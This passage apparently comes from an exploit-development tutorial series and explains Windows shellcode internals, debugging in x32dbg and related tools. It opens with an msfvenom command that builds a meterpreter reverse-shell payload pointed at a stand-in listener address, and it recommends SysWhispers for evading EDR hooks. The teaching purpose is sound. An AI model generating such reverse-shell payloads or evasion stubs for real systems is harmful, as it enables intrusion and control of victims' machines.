$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 \
    -f c -a x86 --platform windows -b "\x00"

# Exec calc.exe (proof of concept)
$ msfvenom -p windows/exec CMD=calc.exe \
    -f c -a x86 --platform windows -b "\x00"

But understanding how it works under the hood — PEB walking, export parsing, API resolution — is essential for writing custom payloads, debugging failed exploits, and analyzing malware.

Linux vs Windows Shellcode — Complete Comparison

Aspect                | Linux                                  | Windows
Syscall interface     | Stable, numbered (int 0x80 / syscall)  | Unstable, undocumented (changes per version)
How to call OS        | Load registers, trigger interrupt      | Must find and call DLL functions dynamically
Finding functions     | Not needed: syscall numbers are fixed  | Walk PEB → parse PE exports → resolve by hash
Position independence | jmp-call-pop for data references       | PEB walking is inherently position-independent
Typical size (shell)  | 25-50 bytes                            | 200-500 bytes
Null byte avoidance   | Same techniques                        | Same techniques
Reverse shell size    | 70-100 bytes                           | 300-500 bytes
Complexity            | Simple (register + interrupt)          | Complex (PEB + PE parsing + API calls)
Key skill             | Understanding syscall ABI              | Understanding PE format and Windows internals
Encoding              | shikata_ga_nai, XOR                    | Same encoders work

The size difference is dramatic. A Linux execve("/bin/sh") shellcode can be as small as 21 bytes. The equivalent Windows shellcode (finding kernel32, resolving WinExec, calling it) is typically 150 bytes or more. This is almost entirely due to the extra work of dynamic API resolution.

Debugging Shellcode with x32dbg

When shellcode doesn’t work (and it often doesn’t on the first try), x32dbg is your best friend.

Method 1: Test Harness

Compile the C test harness (above), load it in x32dbg, and step through:

1. Set breakpoint at the VirtualAlloc return
2. After VirtualAlloc, note the allocated memory address
3. Set breakpoint at the call to the shellcode (the function pointer call)
4. Step into — you're now inside your shellcode
5. Step through instruction by instruction
6. Watch registers and the stack at each step

Method 2: Inject into a Process

1. Load target process in x32dbg
2. Allocate memory: right-click memory map → Allocate Memory
3. Write shellcode bytes to the allocated region
4. Set EIP to the shellcode address
5. Step through

Key Things to Watch

  • EBX after PEB walk: does it contain a valid kernel32.dll base? It should be 64 KB aligned (low 16 bits zero, e.g. 0x7xxx0000 in many 32-bit processes), and the memory there should start with "MZ".
  • The export table parse: does the Export Directory pointer computed from e_lfanew land inside kernel32.dll? Check with Memory Map to verify it’s within kernel32.dll’s range.
  • The hash comparison: set a conditional breakpoint on the cmp instruction to catch when your target hash matches.
  • The function address: after find_function returns, is EAX a valid code address within kernel32.dll?
  • The stack before API calls: are arguments in the right order? Is the stack aligned?
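The first check can be partly automated. Loaded images start on a 64 KB allocation boundary, begin with "MZ", and have e_lfanew (at +0x3C) pointing at "PE\0\0". The sketch below uses a hypothetical `looks_like_module` helper and a fabricated header standing in for bytes copied from x32dbg's dump window, and reports which of those properties fail.

```python
import struct

def looks_like_module(base, header):
    """Hypothetical helper: list what is wrong with a candidate module base.
    `header` is the bytes dumped from `base` (enough to cover the PE signature).
    An empty list means the basic checks passed."""
    problems = []
    if base & 0xFFFF:
        problems.append("base is not 64 KB aligned")
    if header[:2] != b"MZ":
        problems.append("no MZ signature at base")
        return problems
    e_lfanew = struct.unpack_from("<I", header, 0x3C)[0]
    if header[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        problems.append("e_lfanew does not point at a PE signature")
    return problems

# Fabricated header standing in for a real dump.
dump = bytearray(0x200)
dump[0:2] = b"MZ"
struct.pack_into("<I", dump, 0x3C, 0xE8)
dump[0xE8:0xEC] = b"PE\0\0"
print(looks_like_module(0x76B00000, bytes(dump)))   # []
print(looks_like_module(0x76B01234, bytes(dump)))   # ['base is not 64 KB aligned']
```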

Further Reading and Tools

Resource                 | Purpose
msfvenom                 | Generate Windows shellcode for Metasploit payloads
Donut                    | Convert .NET assemblies and PE files into position-independent shellcode
SysWhispers              | Generate direct syscall stubs (bypass API hooking by EDR)
Shellcode compiler (scc) | Compile C code into position-independent shellcode
PE-bear                  | GUI PE parser, helps understand DLL structures
Windows Internals (book) | Deep dive into PEB, TEB, and loader internals

Final Thoughts

Windows shellcode is harder than Linux shellcode. There’s no way around it. The PEB walking, PE export parsing, and dynamic API resolution add complexity that simply doesn’t exist on Linux. A Linux shellcode writer thinks about registers and syscall numbers. A Windows shellcode writer thinks about PE structures, linked lists, and hash-based function resolution.

But this complexity is also what makes it interesting. The PEB walk is an elegant solution to a real problem — finding code at runtime without any hardcoded addresses. It’s the same technique that malware uses to resolve API functions dynamically (making static analysis harder). Understanding it gives you insight into both offensive and defensive security on Windows.

If you’ve followed the Linux and Windows exploit development series to this point — from basic GDB reversing through stack overflows, ret2libc, and now shellcode internals — you have a solid foundation in low-level exploitation on both platforms.

Happy reversing!
